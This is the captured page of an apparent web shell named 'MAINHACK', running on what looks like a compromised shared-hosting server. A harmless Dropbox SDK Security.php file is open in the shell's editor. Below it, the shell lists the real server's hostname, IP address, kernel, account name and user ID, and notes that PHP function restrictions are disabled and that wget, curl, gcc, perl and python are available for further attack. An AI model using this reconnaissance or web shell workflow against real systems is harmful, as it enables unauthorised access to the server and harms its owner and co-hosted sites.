[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Security.php
<?php namespace Dropbox; /** * Helper functions for security-related things. */ class Security { /** * A string equality function that compares strings in a way that isn't suceptible to timing * attacks. An attacker can figure out the length of the string, but not the string's value. * * Use this when comparing two strings where: * - one string could be influenced by an attacker * - the other string contains data an attacker shouldn't know * * @param string $a * @param string $b * @return bool */ static function stringEquals($a, $b) { // Be strict with arguments. PHP's liberal types could get us pwned. if (func_num_args() !== 2) { throw new \InvalidArgumentException("Expecting 2 args, got ".func_num_args()."."); } Checker::argString("a", $a); Checker::argString("b", $b); $len = strlen($a); if (strlen($b) !== $len) return false; $result = 0; for ($i = 0; $i < $len; $i++) { $result |= ord($a[$i]) ^ ord($b[$i]); } return $result === 0; } /** * Returns cryptographically strong secure random bytes (as a PHP string). * * @param int $numBytes * The number of bytes of random data to return. * * @return string */ static function getRandomBytes($numBytes) { Checker::argIntPositive("numBytes", $numBytes); // openssl_random_pseudo_bytes had some issues prior to PHP 5.3.4 if (function_exists('openssl_random_pseudo_bytes') && version_compare(PHP_VERSION, '5.3.4') >= 0) { $s = openssl_random_pseudo_bytes($numBytes, $isCryptoStrong); if ($isCryptoStrong) return $s; } if (function_exists('mcrypt_create_iv')) { return mcrypt_create_iv($numBytes); } // Hopefully the above two options cover all our users. But if not, there are // other platform-specific options we could add. throw new \Exception("no suitable random number source available"); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium56.web-hosting.com
Server IP: 198.54.119.70
PHP Version: 8.2.30
Server Software: LiteSpeed
System: Linux premium56.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 70.58 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: bkunreyz
User ID (UID): 830
Group ID (GID): 826
Script Owner UID: 830
Current Dir Owner: 830